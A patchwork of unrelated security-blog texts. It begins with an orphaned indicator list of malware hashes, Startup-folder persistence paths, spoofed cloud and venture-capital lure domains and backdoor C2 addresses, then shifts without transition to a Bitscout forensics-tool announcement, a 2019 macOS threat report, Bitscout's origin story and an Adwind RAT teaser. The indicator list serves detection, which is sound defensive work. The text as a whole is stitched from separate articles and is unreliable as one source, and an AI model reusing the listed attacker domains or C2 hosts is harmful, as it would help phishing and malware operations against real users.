98e30453bbf1c9c9f48368f9bbe69edd    Z Venture Capital Presentation(Protected).docx
9ad7b21603ecce5ee744ba8aa387fb6c    Pantera Capital Investment Agreement(Protected).docx.123.docx.123

Injected remote template
3dd638551b03a36d13428696dcada5d8
2da244dc9bbdbf2013b7fbc2a74073a2
f3157dc297cb802c8ae2f07702903bfa

Visual Basic Script
ce09cdb7979fb9099f46dd33036b9001    xivwtjab.vbs
f7f4aa55a2e4f38a6a3ea5a108baedf5    vwnozphn.vbs

Powershell
ae52b28b360428829c4fcdc14e839f19    usoclient.ps1

Powershell agent(VBS-wrapped)

73572519159b0c27a18dbbaf25ef1cc0  guide.vbs
8ae6aa90b5f648b3911430f14c92440b  %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\check.vbs
ae12a668dd9f254c42fcd803c7645ed1  1.vbs
589f1bb4da89cfd4a2f7f3489aa426a9  %APPDATA%\microsoft\windows\start menu\programs\startup\guide.vbs
73572519159b0c27a18dbbaf25ef1cc0  guide.vbs

Backdoor
1d0fc2f1a6eb2b2bfa166a613ca871f0
db91826cb9f2ad6edfed8d6bab5bef1f    users.dll, wmc.dll
9c592a22acdfb750c440fda31da4996c

Keylogger
f29be5c7e602e529339fda35ff91bd39

Screencapture malware

f194e074e7d73c544eebb70e2e2785a1

Injector
ec2b51dc1dc99165a0eb46b73c317e25    cssvc.dll
d8e51f1b9f78785ed7449145b705b2e4    cfssvc.dll
dd2d50d2f088ba65a3751e555e0dea71    bfcsvc.dll
f5317f1c0a10a80931378d68be9a4baa    lssc.dll
8727a967bbb5ebd99789f7414d147c31    sst.dll
cab281b38a57524902afcb1c9c8aa5ba    bnt.dll
6a2cbaea7db300925d25d9decf461d95    lmsvc.dll
33a60ea8859307d3fd1a1fe884e37d2d
1993ebb00cb670c6e2ca9b5f6c6375c4    sessc.dll
1fb48113d015466a272e4b70c3109e06    wssc.dll
33ae39569f0051d8dc153d7b4e814a67
525345989e10b64cd4d0e144eb48171f
724d11c2cae561225e7ed31d7517dd40    lsasvc.dll
56df737f3028203db8d51ed1263160ad    ocss.dll
a160b36426ce77bccdd32d117eeb879b    csscv.dll
8fa484d35e60b93a4128dc5de45ec0df    wmmc.dll
5cc93ccc91b2849df55d89b360fbae58
630ba28be4f55ea67225a3760f9e8c1f

Persistence Backdoor #1
2934a7a0dfaf2ebc81b1f089277129c4  Default.rdp
6c97c64052dfdc457b001f84b8657435  Default.rdp
bdc354506d6c018b52cb92a9d91f5f7c  Default.rdp
737478dbd1f66c9edb2d6c149432be26  Default.rdp
5912e271b0da85ae3327d66deabf03ed  Default.rdp
d209c3da192c49cecb5a7b3d0f7154ac  Default.rdp
8d8f3a0d186b275e51589a694e09e884  Default.rdp
7ccf3ddbdb175fcfece9c4423acf07b6
0a9b8ca2988208b876b74641c07f631e  Default.rdp

Persistence Backdoor #2
9b30baa7873d86f985657c3e324ac431  vsat.dll
ae79ea7dfa81e95015bef839c2327108  ssdp.dll
ca9b98f17b9e24ca3f802c04eb508103
849dd9e09cc2434ee7dbdbf9e1c408b2
804523ecb9f7809fc2377d03b47dba22
2b7e434e52ff7480ae06ba901f8efbfd
7129020312b85d5b1e760fc57b567d95
ea9d8b81c9f85fd142639997187b447e
e80f9d2fa735d7ab3bd9e954c4fcb6d0
e2ddf13340ba79b2635618e5675eea23
00a145e8f67a92b01ce4d85a0ed6bd77
73aed6bcf90f936f3fbcb389a133d7c8
ff28ec14ec926b9892c61b9bf154a910
97e5c0fe8089da97665a22975e2c86de
f60d7f620dc925c4e786bcf46856f4c8
4fbff7f0f62b26963b56c0fc23486891
4bb579d59830579be9ead9f74a55001e
aafc80ff2afc71b0d5abd6c8d2809e65
9850b24f8d70ad957f328961170e2d40
58495a2083065b36040eea288a9d5e17
f1cfd14b030e6b5d75e777ace530dad9
1fb25f72e4eb26b0df154de28dbff74c
1b1acc7f27717905e7094f338f81db9f
3776d4a24213972b54b9ed3360ac7883
c93f3bb4f7b19f5eb6f736f2659c4dae
9084620e0219c035d60d395be1bf4cae
2e38f37a23d9f00a02098dd302fc14e2

Domains
abiesvc[.]com
abiesvc[.]info
abiesvc.jp[.]net
atom.publicvm[.]com
att.gdrvupload[.]xyz
authenticate.azure-drive[.]com
azureprotect[.]xyz
backup.163qiye[.]top
beenos[.]biz
bhomes[.]cc
bitcoinnews.mefound[.]com
bitflyer[.]team
blog.cloudsecure[.]space
buidihub[.]com
chemistryworld[.]us
circlecapital[.]us
client.googleapis[.]online
cloud.azure-service[.]com
cloud.globalbrains[.]co
cloud.jumpshare[.]vip
cloud.venturelabo[.]co
cloudshare.jumpshare[.]vip
coin-squad[.]co
coinbig[.]dev
coinbigex[.]com
deepmind[.]fund
dekryptcap[.]digital
dllhost[.]xyz:5600
doc.venturelabo[.]co
doc.youbicapital[.]cc
doconline[.]top
docs.azureword[.]com
docs.coinbigex[.]com
docs.gdriveshare[.]top
docs.goglesheet[.]com
docs.securedigitalmarkets[.]co
docstream[.]online
document.antcapital[.]us
document.bhomes[.]cc
document.fastercapital[.]cc
document.kraken-dev[.]com
document.lundbergs[.]cc
document.skandiafastigheter[.]cc
documentprotect[.]live
documentprotect[.]pro
documents.antcapital[.]us
docuserver[.]xyz
domainhost.dynamic-dns[.]net
download.azure-safe[.]com
download.azure-service[.]com
download.gdriveupload[.]site
drives.googldrive[.]xyz
drives.googlecloud[.]live
driveshare.googldrive[.]xyz
dronefund[.]icu
drw[.]capital
eii[.]world
etherscan.mrslove[.]com
faq78.faqserv[.]com
fastdown[.]site
fastercapital[.]cc
file.venturelabo[.]co
filestream[.]download
foundico.mefound[.]com
galaxydigital[.]cc
galaxydigital[.]cloud
googledrive[.]download
googledrive[.]email
googledrive[.]online
googledrive.publicvm[.]com
googleexplore[.]net
googleservice[.]icu
googleservice[.]xyz
gsheet.gdocsdown[.]com
hiccup[.]shop
innoenergy[.]info
isosecurity[.]xyz
jack710[.]club
jumpshare[.]vip
kraken-dev[.]com
ledgerservice.itsaol[.]com
lemniscap[.]cc
lundbergs[.]cc
mail.gdriveupload[.]info
mail.gmaildrive[.]site
mail.googleupload[.]info
mclland[.]com
microstratgey[.]com
miss.outletalertsdaily[.]com
msoffice.qooqle[.]download
note.onedocshare[.]com
onlinedocpage[.]org
page.googledocpage[.]com
product.onlinedoc[.]dev
protect.antcapital[.]us
protect.azure-drive[.]com
protect.venturelabo[.]co
protectoffice[.]club
pvset.itsaol[.]com
qooqle[.]download
qoqle[.]online
regcnlab[.]com
reit[.]live
securedigitalmarkets[.]ca
share.bloomcloud[.]org
share.devprocloud[.]com
share.docuserver[.]xyz
share.stablemarket[.]org
sharedocs[.]xyz
signverydn.sharebusiness[.]xyz
sinovationventures[.]co
skandiafastigheter[.]cc
slot0.regcnlab[.]com
svr04.faqserv[.]com
tokenhub.mefound[.]com
tokentrack.mrbasic[.]com
twosigma.publicvm[.]com
up.digifincx[.]com
upcraft[.]io
updatepool[.]online
upload.gdrives[.]best
venturelabo[.]co
verify.googleauth[.]pro
word.azureword[.]com
www.googledocpage[.]com
www.googlesheetpage[.]org
www.onlinedocpage[.]org
youbicapital[.]cc

C2 address used by backdoor
118.70.116[.]154:8080
163.25.24[.]44
45.238.25[.]2
devstar.dnsrd[.]com
fxbet.linkpc[.]net
lservs.linkpc[.]net
mmsreceive.linkpc[.]net
mmsreceive.linkpc[.]net
msservices.hxxps443[.]org
onlineshoping.publicvm[.]com
palconshop.linkpc[.]net
pokersonic.publicvm[.]com
press.linkpc[.]net
rubbishshop.linkpc[.]net
rubbishshop.publicvm[.]com
socins.publicvm[.]com
vpsfree.linkpc[.]net

Update: the domain cdn.discordapp.com was removed from the IOCs section because it is used by a legitimate service/application.

Virus outbreaks are always gruesome: people, animals or computer systems get infected within a short time. Of course, viruses spreading across our physical world always take priority over the virtual world. Nevertheless, everyone should keep doing their job, which includes all kinds of malware researchers, digital forensics experts and incident responders. At times like this, we all realize how important it is to be able to work remotely. However, the duties of a security researcher or a digital forensics expert pushes them to travel, visit victims or collect digital evidence in an ongoing hunt for malware artefacts. What can we do to reduce the need for travel? Of course, keep looking for replacement of our physical routines with remote ones.

It is about two and half years since we first open-sourced a tool for remote digital forensics called Bitscout. Born while I was with Digital Forensics Lab at INTERPOL, the tool has evolved and helped us in many cyberinvestigations. Based on the widely popular Ubuntu Linux distribution, it is packed with forensics and malware analysis tools created by a large number of excellent developers around the world.

What can it do? Well, we have tried to identify what it is that it *cannot* do and other expensive commercial tools used in digital forensics can. We have not really been able to find anything! Moreover, we have built so many new interesting techniques that are not available in commercial tools that it has every chance to replace commercial solutions in your organization if it gets into the right hands.

Let me just remind you about the approach we use in Bitscout:

1. Bitscout is completely FREE, which helps reducing your forensics budget! Yay!
2. It is designed to be remote, which also saves your time and money spent for travelling. And of course you can use the same techniques locally! To be frank, in light of the powers of all those forensic tools that are part of the toolkit, Bitscout itself is the least important element: the true value is in the knowledge of the underlying tools that you get access to by using Bitscout, not the product they ship with.
3. Mastering Bitscout follows a steep curve, which, in the end, reinforces your experts’ technical foundations.
4. Bitscout records remote forensics sessions internally, which makes it perfect for replaying and learning from more experienced users or using as evidential proof of discovery.
5. It is fully open source, so you need not wait for the vendor to implement a patch or feature for you: you are free to reverse-engineer and modify any part of it.

Today, I am happy to announce that we are releasing a new version of Bitscout, based on the upcoming release of Ubuntu 20.04, scheduled for April 2020.

So, what is new in Bitscout 20.04 other than extended hardware support leveraging new OS and updated forensics tools from Canonical Ltd official repositories?

First of all, we have launched a project website at bitscout-forensics.info.

The website should become the go-to destination for those looking for tips and tricks on remote forensics using Bitscout and whatnot. In reality, Bitscout had been our internal tool for a long time and had been used only by a limited number of highly skilled researchers, who knew exactly how to use it. Yes, like many researchers, we lacked proper documentation and manuals which we will address with our new website. We have already linked several presentation videos and slides with live demos seen by security conferences and meetups. It is true that some of those commands we used in our demos are crazy long one-liners. So, to make it easy for you to copy them and try them out, we have started recording terminal sessions in ASCII video casts. Kudos to the awesome folks at asciinema.org! This way, should you want to try some of our black magic recipes, you can copy and paste them from a browser or a terminal into your own session.

Second, to address a popular request, we have released demo versions of three flavors of pre-built Bitscout images: minimal, balanced and full. This way, newcomers can easily try Bitscout without going through the whole build process. The download URLs for the ISO image files are available on the project website. However, please note they must not be used in a production environment.

Third, our little community of contributors keeps growing. I am happy to highlight some of the features contributed by others. Kudos to Xavier Mertens aka @xme!

1. The following new tools from the security community are now part of Bitscout (full build) by default:
   • RegRipper,
   • Bulk Extractor,
   • Loki.

   It is great to have modern scanners such as Loki with an updated rich collection of Yara rules that comes with it.

2. Optional logging of bash commands to a remote syslog server. This is particularly useful for environments where a Bitscout instance may be unexpectedly powered off or disconnected for a long time due to a network failure. It is also a great way to remember which commands you have run to find the clues.

And, if it feels hard for you to start using Bitscout, then join our training session on April 5-6 in the beautiful city of Barcelona, Spain. We will be demonstrating how to build your own Bitscout and customize it with your own tools, and of course walking you through the standard forensics procedure. Some of our advanced tasks include hypervisor debugging to overcome just about any type of proprietary full disk encryption. Our exercises will focus on the most popular platforms, covering Windows, Linux and macOS forensics challenges, along with some real malware. Stay safe and we hope to see some of you in Barcelona! Join us there!

Introduction

The belief that there are no threats for the macOS operating system (or at least no serious threats) has been bandied about for decades. The owners of MacBooks and iMacs are only rivaled by Linux users in terms of the level of confidence in their own security, and we must admit that they are right to a certain degree: compared to Windows-based systems, there are far fewer threats that target macOS. However, the main reason for this is the number of potential victims: there are many more computers running Windows than those running macOS. However, the situation is changing, since the popularity of the latter platform is growing. Due to this and despite all the efforts that have been taken by the company, the threat landscape for Apple devices is changing, and the amount of malicious and unwanted software is growing.

For the purposes of this report we used the statistics from Kaspersky Security Network cloud infrastructure. It stores information about all of the malicious programs and other threats that our macOS product users agreed to anonymously share with us. In fact, all these threats at some point attacked the computers of Kaspersky security solution users, but these attacks were successfully repelled.

Figures and trends

Phishing

• During the first half of 2019, we detected nearly 6 million phishing attacks on macOS users. Of these, 11.80% targeted corporate users.
• The countries with the largest share of unique macOS users who experienced phishing attacks were Brazil (30.87%), India (22.08%), and France (22.02%).
• The number of phishing attacks that make use of the Apple brand name grows by 30–40% every year. In 2018, the number of such attacks approached 1.5 million. As of June, the number of phishing attacks in 2019 has already exceeded 1.6 million, which is an increase of 9% over the entire previous year.

Malicious and potentially unwanted software

• From 2012 to 2017, the number of macOS users who have experienced attacks from malicious and potentially unwanted programs grew, approaching 255,000 attacked users per year. However, starting in 2018, the number of attacked users began to decrease, and in the first half of 2019 it only amounted to 87,000.
• The number of attacks on macOS users through malicious and potentially unwanted programs has been increasing annually since 2012, and in 2018 it exceeded 4 million attacks. During the first half of 2019, we registered 1.8 million attacks of this kind.
• The vast majority of threats for macOS in 2019 were in the AdWare category. As for the malware threats, the Shlayer family, which masquerades as Adobe Flash Player or an update for it, has been the most prevalent.
• More than a quarter of Mac users who are protected by Kaspersky solutions and have experience malicious and potentially unwanted software attacks live in the USA.

Phishing for Mac users

We started collecting detailed statistics on phishing threats that target macOS users in 2015. The data that has been collected over the last four years suggests that the number of phishing attacks on macOS users is definitely growing, and quite rapidly at that. While in 2015 we registered a total of 852,293 attacks, in 2016 this figure grew by 86% to over 1.5 million, and in 2017 it skyrocketed to 4 million. In 2018, the number of attacks continued to grow, crossing the 7.3 million mark. At this point we can see that during the first half of 2019 alone, 5,932,195 attacks were committed, which means that the number of attacks may exceed 16 million by the end of the year if the current trend continues.

Growth in the number of phishing attacks on macOS users, 2015–2019

The share of corporate macOS users who faced phishing attacks during the first half of 2019 came up to 11.80%. This is a slight increase compared to the same period in 2018, when this category made up 10.25%.

The phishing page subject matters

In order to understand what services phishing pages impersonate, we analyzed the most common phishing tricks and the geography of attacked users. Then we compared the results with the data from the same period of 2018.

Both in 2019 and 2018, the phishing pages visited by MacOS users most often pretended to be banking services (39.95% in 2019 and 29.68% in 2018), the second popular being global Internet portals (21.31% in 2019 and 27.04% in 2018). Social networks came in third in 2019 (12.3%), taking up the online stores’ place (10.75% in 2018).

Phishing pages by share of users, first halves of 2018 and 2019

Geography

The countries with the largest share of unique macOS product users facing phishing attacks during the first half of 2019 were Brazil (30.87%), India (22.09%), and France (22.02%). In 2018, the top three countries were the same as in 2019. The only difference was in the percentages of users who were attacked: Kaspersky solutions prevented attacks against one out of four Mac product users in Brazil (26.02%), against one out of five in France (20.86%) and 17.70% in India.

Geography of phishing attacks by share of users, first halves of 2018 and 2019

Spam and phishing attacks that impersonate Apple

Among the phishing attacks faced by macOS users we would separately focus on fake web pages that mimic Apple’s official pages or simply mention the brand. Not so long ago, in 2016, there were relatively few attacks (755,000) that tried to take advantage of the brand. But in 2017 they had grown by almost 40% to exceed 1 million, and a year later they almost reached 1.5 million. We have every reason to believe that a new record will be set in 2019: during the first half of the year alone, our solutions prevented more than 1.6 million attacks, which means that by the end of the year we can expect at least twofold growth.

Number of phishing attacks using the Apple brand, 2016–2019

Let’s take a closer look at some examples of phishing pages that mimic the official Apple website. Naturally, most commonly these phishing attacks aim to steal users’ Apple IDs.

Examples of phishing pages that are designed to steal AppleIDs

Links to these sites are usually sent in emails that allegedly come from Apple Support. The recipient is threatened that their account will be locked unless they click the link and log in to confirm the information that has been specified in their profile.

Examples of phishing emails that have been sent to steal an AppleID

Another phishing trick is thank you messages for purchasing an Apple device or app on the App Store. The “client” is invited to learn more about the product (or cancel the purchase) by clicking a link that leads to a phishing page. Here, the victim is required to enter their Apple ID login and password, which, of course, will be sent to the attackers.

Fake malware attacks

Another variation on phishing web pages is malware infection detection notification pages. The design for these notifications varies. Some of them are very high quality, and they faithfully copy the design of the official Apple website. The threat of a malware infection is supposed to convince the user to call a fake support number or install a fake antivirus application that will turn a non-existent threat into a real one.

Example phishing page that provides a notification of a nonexistent infection

Malicious and unwanted programs for macOS

At the time of writing, our database contained 206,759 unique malicious and potentially unwanted files for macOS. The diagram below illustrates the growth of our database, i.e., the number of abovementioned files that were added to the database in a given year.

The number of malicious and potentially unwanted files for macOS, 2004–2019

As you can see from the diagram, up to 2011 the number of malicious files targeting macOS that were detected each year was insignificant. But then the situation changed: starting in 2012, the number of files we collected began to double year over year. However, during the first half of 2019, only 38,677 malicious and potentially unwanted objects were detected, which means that we do not expect to see a similar increase this year over 2018.

In order to identify the changes in the number of macOS users who were attacked by malware in recent years, we examined our statistics from 2012 (the time when data was first systematized) to the present. Much like in the diagram above, you can see a sharp increase in the number of users who were attacked between 2012 and 2017.

Number of unique macOS users attacked by malware, 2012 to June 2019

In order to roughly estimate how often macOS users are attacked by both malicious and unwanted software, we can look at the diagram that illustrates the number of times that Kaspersky products have detected either of the threats.

Number of times that Kaspersky products detected malware and potentially unwanted software for macOS, 2012 to June 2019

This diagram clearly shows an increase in the number of attacks that occurred in 2018. At the same time, the data for 2019 (1,820,578 attacks over the first 5 months) suggests that this year the number of attacks will decline.

Geography of attacks

In order to get an idea of the geographical distribution of threats for macOS and to determine if there are regions where users are more likely to be attacked by malicious software nowadays, we compiled a rating of countries by the share of unique users attacked in the first half of 2019, and, for the sake of comparison, in the first half of 2018.

^{* Kaspersky product for macOS users in the country out of all users of these products}

The top three countries remained the same between 2018 and 2019: the United States came in first place (24.4%), Germany came in second (14.6%), and France came in third (12.4%).

2019 threats

Here are the TOP 10 threats for macOS that we have observed during the first half of 2019:

^{* The share of unique users attacked by this malware out of all users of Kaspersky security solutions for macOS who have been attacked}

With the exception of the Shlayer trojan that came in first place (more about that a little later), the rest of the top ten is filled out by various unwanted software belonging to the AdWare class. The objective of these programs, as you might guess from the name, is to display ads wherever possible: in system notifications, web page banners, search results pages, the browser, etc. This does not actively harm the user, but it definitely does not add a positive spin to using your computer.

Example of malware installed or advertised to users by some types of AdWare

Let us proceed from a general description to specific examples. The AdWare.OSX.Bnodlero family prefer to work with the browser: this software installs ad extensions, and changes the default search engine and homepage. In addition, it can download and install extra adware.

Some samples in the AdWare.OSX.Pirrit family go even further and install a proxy server on the victim’s machine to intercept traffic from the browser. There is another family that is closely connected with this one, Agent.b, since it is precisely this unwanted software that frequently downloads Pirrit. When it is not busy downloading, unpacking, and launching files, Agent.b injects JS code with advertising into the web pages that are viewed by the victim.

We would also like mention the AdWare.OSX.Cimpli family. At first glance it is no different from other adware. However, its samples behave more cunningly, and become purposely inactive if they detect an installed security solution in macOS.

When they detect these types of applications, AdWare.OSX.Cimpli family samples prefer to stay inactive

We assume that this feature was added to Cimpli in order to protect it from being listed in the databases of security software developers and, as a result, from being blocked. However, if there is a chance that the user will delete the program, then the malware will wake up and start working.

The Trojan-Downloader.OSX.Shlayer family, which heads our top ten ranking, downloads and installs various AdWare, mainly from the Bnodlero family (and this is one of the reasons why Bnodlero ranks second).

Why do we detect this particular family so often? It all has to do with how widely it is distributed: if you try to search for sites where you can watch or download a popular movie or TV series for free, the very first search results will lead to resources that request you to update Flash Player in order to view content. It is these updates that contain Shlayer.

Link to a site with Shlayer on the first search results page

Note that this technique of pushing a link to a malicious page up in the search results for certain queries is also used by distributors of other malware. Not so long ago, we studied the threats that target Game of Thrones and other popular TV series fans who wanted to download new and not yet released episodes or watch them online.

One of the websites encouraging users to download malware under the pretext of updating Flash Player

It is worth noting that from the technical point of view, Shlayer is nothing special. Its main executable file is a Bash script that consists of only four lines of code. All that it does is decrypt and run another file that it brings along with it, which in turn downloads, decrypts, and executes another file, which does exactly the same. In the end, this nesting doll of various malware installs several AdWare programs, hides them well and registers them to run at startup.

The main executable file of the Shlayer Trojan is just the outer layer of a nesting doll

Two other malware families that we encountered during the first half of the year are Trojan.OSX.Spynion and Trojan-Downloader.OSX.Vidsler. Both are far from being as popular as Shlayer, as they have been encountered by less than one percent of our users. However, each of them utilizes its own method of deceiving a potential victim, and both deserve attention.

The Trojan.OSX.Spynion trojan is distributed along with several free macOS apps, mainly from sites such as MacUpdate, VersionTracker, and Softpedia. While the app is being installed on the victim’s computer, a malicious component is downloaded and installed. The Spynion’s main objective is to monitor user activity on the network and transfer intercepted confidential data to the attackers’ servers. The trojan also has backdoor functionality, i.e., it allows attackers to remotely connect to the user’s macOS.

Trojan-Downloader.OSX.Vidsler is distributed via banner ad links, only this time under the pretext of requiring the user to update video codecs or download a new version of a video player. In terms of functionality, Vidsler is similar to Shlayer: it downloads, installs, and runs other software, most often from the FkCodec AdWare family.

Lastly, we should point out several rather dangerous trojans, which, fortunately, are not encountered very frequently in the wild. For example, the Trojan-Ransom.OSX.KeRanger family ransomware trojans encrypt all of the user’s files on the drive and demand a ransom to decrypt them. This malware is known to have been distributed through the official website of the Transmission torrent client. Another example is the Trojan-Spy.OSX.Ventir trojan, which has a complex modular architecture and contains not only a backdoor to remotely access the victim’s macOS, but also a keylogger.

MacOS and targeted attacks

Our statistics concerning threats for macOS provide fairly convincing evidence that the stories about this operating system’s complete safety are nothing more than that. However, the biggest argument against the idea that macOS (and iOS as well) is invulnerable to attack is the fact that there already have been attacks against individual users of these operating systems and groups of such users. Over the past few years, we have seen at least eight campaigns whose organizers acted on the presumption that the users of MacBook, iPhone, and other devices do not expect to encounter malware created specifically for Apple platforms.

Due to the nature of Apple’s antivirus software policy, the Kaspersky product line does not contain a security solution for iOS. Due to that we do not have statistics about threats for this operating system. However, along with malware for Android, Kaspersky researchers have also encountered malicious implants for iOS.

Next, we will provide an overview of what we consider to be the most interesting targeted attacks against the macOS and iOS platforms that we have been investigating over 2018 and 2019.

The Skygofree implant for iOS (January 2018)

Soon after the discovery of the Skygofree Android implant, Kaspersky experts found and analyzed an implant for iOS that had been developed by the same group of cybercriminals. It was discovered as a result of the analysis of the Skygofree infrastructure and consisted of several configuration files (MobileConfig) for iOS, which were used to register the device on an MDM server.

Sofacy XAgent (March 2018)

Kaspersky experts closely follow the activity of Sofacy, one of the most professional of cyber espionage groups. One of the tools at the disposal of this group is XAgent, which is a set of malware sharing a common code base, each sample individually modified to infect a specific OS, including macOS and iOS. However, the most recent detected versions of this malware for iOS date back to the end of 2014 and the beginning of 2015. This may mean that cybercriminals have (at least temporarily) lost interest in iPhones and iPads.

Bahamut-related implants for iOS and Windows (July 2018)

While studying the Skygofree iOS implant, our experts attempted to find other malware campaigns that used the results of a study of Apple’s MDM system conducted by the Intrepidus Group to compromise iOS devices. As a consequence, several servers have been discovered that presumably belong to the Bahamut group and have been active since 2017.

Operation AppleJeus (August 2018)

While investigating an attack on a cryptocurrency exchange service conducted by the Lazarus group, we discovered that the attackers sent out messages to potential victims with a link to a malicious macOS cryptocurrency trading app.

ThreatNeedle and Manuscrypt (October 2018)

In 2018, we also discovered that Manuscrypt, a piece of malware used exclusively by the Lazarus group, was engaged in suspicious activity. The new samples of this malware were noticeably different from those exposed during previous campaigns, so we gave them a new name: ThreatNeedle.

Windtail (December 2018)

Shortly after Dark Matter published its findings about the Windshift group in August 2018, we conducted our own investigation on the activities of this group. In particular, we were interested in a piece of macOS malware called Windtail.

New macOS malware from Lazarus (January 2019)

Six months after the AppleJeus operation, we discovered new Lazarus activity campaign that manifested similar symptoms: again, companies from the financial sector were hit, and again previously unknown malware for macOS was used during the attack.

New iOS implant version from FinSpy (mid 2019)

At the end of 2018, we discovered a new version of the FinSpy iOS implant in the wild, which was apparently developed during the summer of that year. This implant was part of the FinSpy Mobile product that was provided by the well-known tracking software developer.

Conclusion

MacOS malware has come a long way from isolated instances that existed in 2004 to hundreds of thousands of types that now exist in 2019. However, the era of explosive growth seems to be behind us, and we cannot but notice the decline in the activity of cybercriminals on this platform. However, the owners of MacBooks and iMacs have never been considered priority targets compared to Windows users, as the latter have always been much more profitable to attack simply because they were far more numerous. In addition, there is a large number of both known and not very well known exploits for Windows, which, when combined with the fact that Windows users tend to install updates irregularly, make it easier and more convenient for cybercriminals to infect Windows systems.

Another important aspect that we have discovered while preparing this report is that instead of full-fledged malware, MacBook and iMac owners increasingly receive annoying, but in most cases relatively harmless ads. It seems that this way of monetizing an infection allows attackers to make a profit and save on expenses. By contrast, it would be much more complicated and expensive to create full-fledged malware for macOS. The reasons for this are both the fact that there are fewer potential victims and the efforts that Apple is making to protect its customers.

Phishing and social engineering, which are now also on the rise, are another example of cheaper threats. The attackers continue to mainly target Apple IDs, which are the users’ key to gaining access to Apple’s infrastructure. Apple IDs are relatively easy to monetize. For example, they can be sold to other criminals. Perhaps the theft of this type of data is now the most dangerous threat macOS users face, in terms of the balance between the probability of the attack and the damage in the event of its success. Moreover, our statistics show that this type of attack is likely to be on the rise in the near future.

An extremely dangerous (but also an extremely rare) threat is a targeted attack on macOS and iOS users, mainly business users. Several well-known cybercriminal groups are currently working to develop malware for these operating systems, but the likelihood that a random user will be the target of such programs is extremely small. However, if you work in a financial institution, such as, for example, a bank, and your MacBook or iPhone is a corporate device, then the chances that you will be targeted increase considerably. In this case the threat is significant enough, so we do not recommend relying on the fact that Apple devices are in general less popular targets, and we recommend seeking out a reliable security solution. More so as we expect the number of targeted attacks on macOS and iOS devices to increase between 2019 and 2020.

To keep your devices on MacOS safe, Kaspersky recommends

• Try to keep macOS and all of your apps up to date
• Use only legitimate software, downloaded from official webpages or installed from Mac App Store
• Start using a reliable security solution like Kaspersky Internet Security that delivers advanced protection on Mac, as well as on PC and mobile devices
• Download and install apps only from the official resources such as Appstore.
• If you need to access your iCloud, for instance to find your phone when it is lost, use only official website.

To reduce the risk for corporate MacOS users, Kaspersky recommends companies to take the following measures

• Implement security awareness training for staff explaining how to recognize and avoid potentially malicious applications or files. For example, employees should not download and launch any apps or programs from untrusted or unknown sources.
• Use a dedicated security products with protection for MacOS and iOS included, such as Kaspersky Endpoint Security for Business. The product empowered with cloud-based threat intelligence and machine learning technics to detect existed and new threats for different operating systems.
• Provide your SOC team with access to the latest Threat Intelligence, which cover threats for MacOS, to keep up to date with the new and emerging tools, techniques and tactics used by threat actors.

Being a malware researcher means you are always busy with the struggle against mountains of malware and cyberattacks around the world. Over the past decade, the number of daily new malware findings raised up to unimaginable heights: with hundreds of thousands of malware samples per day! However, while there are some rare and dangerous malware, not every sample is as malicious as these. Moreover, some of the biggest threats exist only when several ingredients are put together, including multiple malware tools, malicious infrastructure, and interactive commands coming from their operators.

This is why, instead of only looking at malware, we have started tracking groups of attackers and have focused on campaigns and isolated incidents. This has been an increasingly challenging job, because it involves searching for a needle in a haystack of haystacks, and sometimes we’re searching across very distant locations. There are different ways of undergoing searches like this, but the most reliable is that used by law enforcement agencies: full digital forensics. This procedure is time consuming, highly dependent on the availability of a skilled expert on site, and usually involves physical travelling. Our natural response to this problem is to find a solution – and surprisingly no one was offering one. Well, at least not one that was up to our standards!

My Bitscout project started years ago as a hobby. I had been playing with the creation and customisation of LiveCDs. Some time afterwards, when we needed to find traces of a certain attacker on a compromised PC in an African country, I thought I could help. I built a simple and minimal LiveCD on Linux, with a preconfigured VPN client and SSH server, and shared it with the system owner over the Internet. The owner burnt the CD and started the infected PC from it. It worked like a charm: a full control over remote computer connected via the Internet became available from my desk. It was a slow connection but it luckily for me I didn’t use a bandwidth-heavy remote desktop access. A text terminal was more than enough to do the job over a slow modem line. I managed to help the owner acquire a forensically sound disk image of the compromised system, point out the malware and related file locations and, most importantly, extract precious pieces of information, including a malware dropper and spearphishing email.

Time passed, and similar requests appeared again and again. We worked with INTERPOL using the same model: a law enforcement officer would go to the physical disk acquisition location, and with permission from local law enforcement agencies, would let us find the most important evidence on the site – instantly. This cut our time traveling and helped law enforcement with the quick discovery of key artefacts left after a cyberattack.

Bitscout booting process

Some time afterwards many new scenarios started popping up:

1. Manually remediatiating an infected PC (from a rootkit)
2. Sharing remote sessions let us educate new users and increase the speed of analysis
3. Once, I traveled to a customer but I had no expensive enterprise SAS disk controller with me to complete a disk image acquisition with. Using LiveCD I was able to clone the disk via the original server hardware. And I didn’t even have to stay in the cold server room to monitor the progress!

We also worked on making the tool simple and friendly for users who are not familiar with commandline Linux environments. Still, for the sake of having a small disk size, we decided to keep away from GUI tools and X11 servers. Naturally we settled on a TUI (Text UI), which is simple to operate with just arrow keys.

Bitscout 2.0 main window for general users

However, when you work with someone who has never met you, trust is an inherent problem. Just think about it: would you let some remote expert have access to your precious system? If so, I’d be delighted to work with you. But if I were in your shoes, I would be paranoid, and would like to control the process myself. This is quite natural and is something that bothered me in the previous versions of LiveCDs.

This issue of trust could be resolved if we could somehow limit an expert’s access to hardware, and monitor and record everything that he/she does. Following this idea, we built a new version of Bitscout: Bitscout 2.0, which we have just released. The remote expert has root privileges only inside a virtual unprivileged container. The expert can access only those disk devices that are permitted by the owner, and it’s possible for them to install additional software and change system files – all without the risk of compromising the host system or data on the harddrive. This is all done in RAM, and is gone once the system is shutdown. In addition, all remote sessions are recorded and stored outside of the container. This provides a good level of isolation and a way to reconstruct the forensic process for learning purposes, or prove the existince of evidence.

But that’s not all! Bitscout 2.0 is not only based on open-source tools, it is actually an open source tool itself that let’s you build your own LiveCDs – your own types of Bitscout systems. So, the tool is essentially a collection of scripts which anyone can validate, customize and improve.

And you are welcome to do so, because now it’s on Github: https://github.com/vitaly-kamluk/bitscout

Download full report PDF

We have become aware of unusual malware that was found in some banks in Singapore. This malware has many names – it is known as Adwind RAT (Remote Access Tool), AlienSpy, Frutas, Unrecom, Sockrat, JSocket, and jRat. It is a backdoor available for purchase, and is written entirely in Java which makes it cross-platform. According to the author, the backdoor component (called the server) can run on Windows, Mac OS, Linux and Android platforms providing rich capabilities for remote control, data gathering, data exfiltration and lateral movement.

While it is mostly used by opportunistic attackers and distributed in massive spam campaigns there are indications that some of the Adwind samples were used in targeted attacks. In August 2015 AlienSpy popped up in the news related to cyber-espionage against an Argentinian prosecutor who was found dead in January 2015.

#Adwind RAT is an unusual #Java backdoor that was found in some banks in #Singapore #TheSAS2016

Tweet

